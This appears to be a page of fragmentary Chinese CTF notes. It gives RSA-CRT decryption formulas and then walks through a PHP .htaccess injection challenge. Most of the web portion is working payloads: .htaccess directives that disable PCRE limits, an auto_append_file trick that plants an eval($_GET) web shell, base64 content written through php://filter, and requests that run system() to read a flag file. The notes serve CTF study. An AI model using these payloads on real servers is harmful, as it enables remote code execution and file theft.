Study-RSA

1
2
3
4
dp = d % ( p - 1 )
d * e = 1 %( p - 1 )
((d%(p-1))*(e%(p-1)))%(p-1) = 1%(p-1)
dp * e = k(p-1)+1
1
2
3
4
5
6
7
8
dP = (1/e) mod (p-1)
dQ = (1/e) mod (q-1)
qInv = (1/q) mod p

m1 = c^dP mod p
m2 = c^dQ mod q
h = qInv * (m1 - m2) mod p
m = m2 + h * q
1
2
3
4
2
2^7-2=k*7

7^1
1
templates/upload.html
1
2
3
4
5
AddHandler php5-script .htaccess
Satisfy any
#<?php phpinfo(); ?>\
php_value error_log /var/www/ex4a/foo.php
php_value include_path "<?php phpinfo(); __halt_compiler();"

1
/?content=php_value%20pcre.backtrack_limit%200%0a%0dphp_value%20pcre.jit%200%0a%0d%0a%0d%23aa\&filename=.htaccess
1
2
3
4
5
6
/?content=php_value pcre.backtrack_limit 0

php_value pcre.jit 0


#aa\&filename=.htaccess

生成了.htaccess。

1
2
3
4
5
6
7
php_value pcre.backtrack_limit 0

php_value pcre.jit 0


#aa\
Just one chance

第二次。

1
/?a=system(%27cat%20../../../root/flag.txt%27);exit;&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0ICAgIDAKDXBocF92YWx1ZSBhdXRvX2FwcGVuZF9maWxlICAgICIuaHRhY2Nlc3MiCg1waHBfdmFsdWUgcGNyZS5qaXQgICAwCg0KDSNhYTw%2FcGhwIGV2YWwoJF9HRVRbJ2EnXSk7Pz5c&filename=php://filter/write=convert.base64-decode/resource=.htaccess
1
/index.php?a=system('cat ../../../root/flag.txt');exit;&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0ICAgIDAKDXBocF92YWx1ZSBhdXRvX2FwcGVuZF9maWxlICAgICIuaHRhY2Nlc3MiCg1waHBfdmFsdWUgcGNyZS5qaXQgICAwCg0KDSNhYTw/cGhwIGV2YWwoJF9HRVRbJ2EnXSk7Pz5c&filename=php://filter/write=convert.base64-decode/resource=.htaccess

生成了。

1
2
3
4
5
6
7
8
php_value pcre.backtrack_limit    0

php_value auto_append_file ".htaccess"

php_value pcre.jit 0


#aa<?php eval($_GET['a']);?>\&�-�w����
1
2
3
4
5
6
7
8
http://19056a386796436a8c8d1f9694fe8aabcbc77c6f49714b43.changame.ichunqiu.com/?content=

php_value pcre.backtrack_limit 0

php_value pcre.jit 0


#aa\&filename=.htaccess
1
/index.php?a=system(%27cat%20../../../root/flag.txt%27);exit;&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0ICAgIDAKDXBocF92YWx1ZSBhdXRvX2FwcGVuZF9maWxlICAgICIuaHRhY2Nlc3MiCg1waHBfdmFsdWUgcGNyZS5qaXQgICAwCg0KDSNhYTw%2FcGhwIGV2YWwoJF9HRVRbJ2EnXSk7Pz5c%3C%3C&filename=php://filter/write=convert.base64-decode/resource=.htaccess
1
/index.php?a=system(%27cat%20../../../root/flag.txt%27);exit;&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0ICAgIDAKDXBocF92YWx1ZSBhdXRvX2FwcGVuZF9maWxlICAgICIuaHRhY2Nlc3MiCg1waHBfdmFsdWUgcGNyZS5qaXQgICAwCg0KDSNhYTw%2FcGhwIGV2YWwoJF9HRVRbJ2EnXSk7Pz5c&filename=php://filter/write=convert.base64-decode/resource=.htaccess
1
?a=system(%27cat%20../../../root/flag.txt%27);exit;&content=111&filename=php://filter/write=convert.base64-decode/resource=.htaccess
1
2
3
4
5
6
7
8
php_value pcre.backtrack_limit    0

php_value auto_append_file ".htaccess"

php_value pcre.jit 0


#aa<?php eval($_GET['a']);?>\
1
/?filename=.htaccess&content=php_value%20auto_append_fi%5C%0Ale%20.htaccess%0A%23%3C%3Fphp%20eval(%24_POST%5B%22south%22%5D)%3B%20%3F%3E%5C
1
O:4:"Note":2:{s:5:"notes";a:1:{i:0;a:2:{i:0;s:1:"2";i:1;s:1:"2";}}s:7:"isadmin";b:0;}